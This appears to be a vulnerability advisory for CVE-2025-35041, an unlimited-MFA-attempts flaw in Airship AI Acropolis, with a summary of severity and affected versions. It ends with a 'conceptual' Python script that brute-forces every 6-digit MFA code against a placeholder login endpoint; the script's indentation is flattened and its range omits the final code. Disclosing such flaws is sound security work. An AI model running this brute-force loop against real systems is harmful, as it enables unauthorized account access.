Overview

The vulnerability identified as CVE-2025-35041 pertains to Airship AI’s Acropolis product and its handling of Multi-factor Authentication (MFA). This cybersecurity flaw allows for unlimited MFA attempts for a quarter of an hour after a user with valid credentials has logged in. Undeniably, this issue poses a significant risk to businesses and individuals utilizing the affected versions of Acropolis, as it creates an opportunity for unauthorized access and potential data leakage.

Vulnerability Summary

CVE ID: CVE-2025-35041
Severity: High (7.5 CVSS Score)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required
Impact: Potential system compromise and data leakage

Affected Products

Product | Affected Versions

Airship AI Acropolis | <10.2.35, 11.0.20, 11.1.8 How the Exploit Works

The vulnerability arises due to improper handling of MFA by Airship AI Acropolis. Once a user with valid credentials logs into the system, the MFA process allows unlimited attempts to enter the 6-digit MFA code for a 15-minute window. A remote attacker can exploit this by launching a brute-force attack to guess the MFA code during this time period, potentially gaining unauthorized access to the system.

Conceptual Example Code

Although specific exploitation methods may vary, a brute-force attack could conceptually involve a script to automatically generate and attempt all possible 6-digit combinations within the 15-minute window. A rudimentary Python script might resemble:

import requests
username = 'valid_username'
password = 'valid_password'
mfa_code_start = 000000
mfa_code_end = 999999
for code in range(mfa_code_start, mfa_code_end):
response = requests.post('https://target.example.com/login', data = {'username': username, 'password': password, 'mfa_code': str(code).zfill(6)})
if 'Login successful' in response.text:
print("Access granted with MFA code: " + str(code).zfill(6))
break

Please note this is only a conceptual example and does not represent a real exploit.